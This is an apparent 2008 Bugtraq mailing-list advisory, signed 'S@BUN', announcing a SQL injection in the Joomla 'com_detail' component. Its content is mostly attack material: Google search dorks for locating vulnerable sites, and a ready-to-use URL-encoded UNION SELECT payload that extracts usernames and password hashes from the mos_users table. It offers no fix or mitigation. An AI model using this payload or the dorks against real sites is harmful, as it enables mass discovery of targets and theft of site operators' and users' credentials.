
Date: 18 Feb 2008 17:26:00 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: joomla SQL Injection(com_detail)

###############################################################
# 
#   joomla SQL Injection(com_detail)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME 1 : http://www.milw0rm.com/author/1334
#   
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#        
################################################################
# 
#  DORK 1 : allinurl :"com_detail"
# 
#  DORK 2 : allinurl: 
#
################################################################
   EXPLOIT : 

index.php?option=com_detail&Itemid=s@...&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A



################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################
